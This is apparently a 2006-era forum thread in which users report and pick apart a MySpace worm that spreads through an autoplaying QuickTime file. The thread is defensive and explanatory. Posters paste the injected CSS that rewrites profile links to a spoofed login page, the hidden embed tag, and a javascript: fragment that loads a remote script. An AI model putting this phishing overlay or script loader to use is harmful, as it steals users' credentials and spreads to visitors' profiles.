Urgent! New myspace exploit


Recommended Posts

anyone use myspace? just tonight on a bunch of profiles i see this quicktime .mov file appearing everywhere.

Well it automatically plays and as soon as i view my homepage it has appeared on mine. Anyways what it bassically does is change all the links on the myspace layouts to link to http://almobty.com/css/login.html which is obviously a spoofed myspace login page and MANY people will fall for this. this is obviously trying to steal passwords and isnt just a proof of concept like some past myspace exploits.

You can easily get rid of this by removing the code in your movies sections and removing the junk code in about me section which changes the links.

Im not coder but here is the code :(maybe someone could examine it?)

About Me:

<style type="text/css">
div table td font { display: none }
div div table tr td a.navbar, div div table tr td font { display: none }
.testnav { position:absolute; top: 136px; left:50%; _top: 146px }
</style><div style="z-index:5; background-color: #6698CB; margin-left:-400px; width: 800px" align="center" class="testnav"><div style=""><a href="http://almobty.com/css/login.html" target="" class="navbar">Home</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Browse</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Search</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Invite</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Film</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Mail</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Blog</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Favorites</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Forum</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Groups</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Events</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Videos</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Music</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Comedy</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Classifieds</a></div></div>

Movies

<div style="width: 1px; height: 1px; overflow: hidden; text-indent: -9999px"><embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" src=http://almobty.com/css/piAF2iuswo.mov /></div>

The problem is as soon as you visit another profile with it, it comes back and its spreading like wildfire, so maybe remove and keep a low profile for the time being?

http://almobty.com appears to be a foreign website for contracting

Im running firefox 2 (so doesnt only effect IE)

Here is an example:

2005207505678579756_th.jpg

Edited by kaneso
  • Like 1
Link to comment
https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/
Share on other sites

Theres alot of this crap around lately to do with Myspace...thats why I have stayed away from them and been using Facebook...my mates myspace got accessed like that and he had all his friends deleted and messages sent to people saying obscene things...:(

Looking at the code, it is meant to redo the entire thing... basically redo your entire profile. But there is code in it that does nothing. I think someone modified a hack from the past, and it's gotten out of control.

That imageshack photo is kinda odd... eh?

it is a redirect exploit seemingly enough, the mov is used as means of spreading it adds the css code into your profile and uses it to phish you. That sall, and as far as the site it is being hosted on odds are it is a hacked server, what i would be worried about is if someone takes the spread code and uses it for something else. Thkn abotu it if they are able to get the code to edit yoru profile with a mov file just what else could be done with this

heh, all movies from myspace are down. myspace is crap anyway, why do people still use it ?

also, http://almobty.com DNS info:

Name Servers:

NS1.ALL-SOLUTION.NET

NS2.ALL-SOLUTION.NET

Technical Contact:

Almobty Co.

Al-Mobty Company for contracting ([email protected])

+966.4658695

Fax: +966.4659242

Olaya Street, POBox 7705 Riyadh 11472,

Tel. 966-1-4658695 & Fax. 4659242

RIYADH, 11472

SA

Damn, thats a good hacker :)

part source of QT file:

<java script:void((function(){var e=window.document.createElement('script');e.setAttribute('src','http://www.cake.fi/images/js.js');window.document.body.appendChild(e);})());> T<>?orig...

Edited by n_K

heh, all movies from myspace are down. myspace is crap anyway, why do people still use it ?

also, http://almobty.com DNS info:

Name Servers:

NS1.ALL-SOLUTION.NET

NS2.ALL-SOLUTION.NET

Technical Contact:

Almobty Co.

Al-Mobty Company for contracting ([email protected])

+966.4658695

Fax: +966.4659242

Olaya Street, POBox 7705 Riyadh 11472,

Tel. 966-1-4658695 & Fax. 4659242

RIYADH, 11472

SA

Damn, thats a good hacker :)

part source of QT file:

<java script:void((function(){var e=window.document.createElement('script');e.setAttribute('src','http://www.cake.fi/images/js.js');window.document.body.appendChild(e);})());> T<>?orig...

If you uses a text editor you can change the location of the script that it looks for and create your own custom script for your myspace page. I have download the js.js and looked at the code it just seem try to write over your formating and the it spams every 6 sec. to random id.

If you uses a text editor you can change the location of the script that it looks for and create your own custom script for your myspace page. I have download the js.js and looked at the code it just seem try to write over your formating and the it spams every 6 sec. to random id.

yeh, but it writes the javascript through the quicktime file so open the quicktime .mov in notepad, look at the binary followed by "apple text writer plugin"

I got this, Does the users PC become infected with anything?

When I view my profile and click home I get re directed to

http://www.../images/login.html

Which doesnt go anywhere obviously, Has this thing installed anything on my PC?

Edited by Sawyer12
  • 1 month later...

This has actually been around for a while. I took note of it back in October and thought nothing of it. I even warned people about this .mov exploit and nobody really listened. I guess I should have posted something here, eh? :laugh: . This has happened to me twice now, and yes, I know how to get rid of it. But I'm tired of the insecure status of Myspace, and therefore have deleted my account.

I'm glad someone made this public, as it should be addressed to both Myspace and the people who use it.

Everyone who has contributed to this thread thus far has explained the majority of this exploit. There are several sources of the .mov and I don't think this will be fixed for a while. I suggest that you leave Myspace as soon as possible, people. I'm actually glad this happened to me more than once; now I won't be wasting any MORE time. :laugh:. It's only going to get worse from here on, and we can't really do anything about it.

Ah well. I guess that's how it goes... :p

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Posts

    • Qmmp 2.3.3 by Razvan Serea Qmmp (Qt-based MultiMedia Player) is a free, open-source audio player that delivers a classic music listening experience with a modern foundation. Inspired by the legendary Winamp, Qmmp features a familiar, customizable interface that supports both Winamp and XMMS skins, making it instantly recognizable to long-time users. It handles a wide variety of audio formats including MP3, OGG Vorbis, FLAC, WAV, AAC, and many others, ensuring smooth playback across diverse music libraries. In addition to basic playback, Qmmp offers advanced features such as a 10-band equalizer, crossfading, gapless playback, and audio visualization plugins. Users can manage playlists efficiently, create and save multiple lists, and even enable streaming from online sources. Plugin support extends the player’s capabilities, allowing integration of features like lyrics display, ReplayGain, and more. Built with the Qt framework, Qmmp runs smoothly and efficiently, making it ideal even for older systems. 10 great QMMP features you might not know: Global Hotkeys Support – Control playback using customizable system-wide keyboard shortcuts. CUE Sheet Support – Automatically detects and plays tracks from CUE files for full album playback. Last.fm Scrobbling – Integrated support for sending playback data to Last.fm. Audio CD Playback – Play music directly from audio CDs. Command Line Interface – Control Qmmp via command-line options for scripting or automation. System Tray Integration – Minimize to and control playback from the system tray. MPRIS Support – Integration with desktop media player controls via the MPRIS (Media Player Remote Interfacing Specification) interface. Spectrum Analyzer and Oscilloscope – Built-in visualizations for real-time audio feedback. Configurable Notifications – Custom pop-ups for track changes and playback status. Multiple Output Backends – Support for ALSA, PulseAudio, JACK, and more, offering flexible audio routing. Qmmp 2.3.3 changelog: fixed build with PipeWire versions less than 0.3.50; fixed settings dialog layout; fixed default CUE encoding; fixed possible null pointer dereference; fixed tracks order when added using drag and drop (2.3.3 only); fixed uninitialized structure usage; improved sid plugin: added libsidplayfp 3.0 support; added feature to build without residfp engine; fixed memory leak; fixed displaying audio information; updated Japanese translation (2.3.3 only). Download: Qmmp 64-bit | 24.0 MB (Open Source) Download: Qmmp 32-bit | 24.1 MB View: Qmmp Homepage | Screenshot Get alerted to all of our Software updates on Twitter at @NeowinSoftware
    • BATorrent 3.0.3 is out.
    • The current Statcoungter desktop numbers has Google Chrome increasing it's market share this past year and currently commanding 75% share. Everybody else is just making up the numbers with even MS Edge losing 3% this past year and has dipped just below 10% share which is staggering considering it's default on every Windows deviced purchased. If these numbers are correct that terrible Edge number is both devastating and embarrassing for MS especially when you add in the terribly low Bing market share. This leads me to ask a couple of questions as the default browser holding just less than 10% market share seems really weird. It used to be that all Chromium browsers were being counted as Google Chrome in some cases.  Is this still happening? Do these high Google Chrome numbers contains some Edge user numbers?
    • Yeah, all web browsers seem to have some junk in them these days. The regular Brave browser has a lot of unnecessary stuff in it, similar to Microsoft Edge, so I don't see any benefits of using Brave over Microsoft Edge if you already have Microsoft Edge fully set up with adblockers and that. The cleanest or best free browser outside of 'Microsoft Edge' I’ve tried so far is 'Opera Air'. It still has some bloat, but nowhere near as much as Brave browser, for example. I also really like the web browser called 'Floorp' that is based on Firefox. I have a system wide Adblocking program for Windows 11 that doesn't just blocks ads in the the web browser, but over the whole thing. I don't really need a web browser with an inbuilt adblocker because of that.
  • Recent Achievements

    • Rookie
      moog19 went up a rank
      Rookie
    • Mentor
      grik went up a rank
      Mentor
    • Dedicated
      JKR earned a badge
      Dedicated
    • One Year In
      CHUNWEI earned a badge
      One Year In
    • Conversation Starter
      FBSPL earned a badge
      Conversation Starter
  • Popular Contributors

    1. 1
      +primortal
      491
    2. 2
      PsYcHoKiLLa
      270
    3. 3
      Skyfrog
      75
    4. 4
      Steven P.
      68
    5. 5
      FloatingFatMan
      63
  • Tell a friend

    Love Neowin? Tell a friend!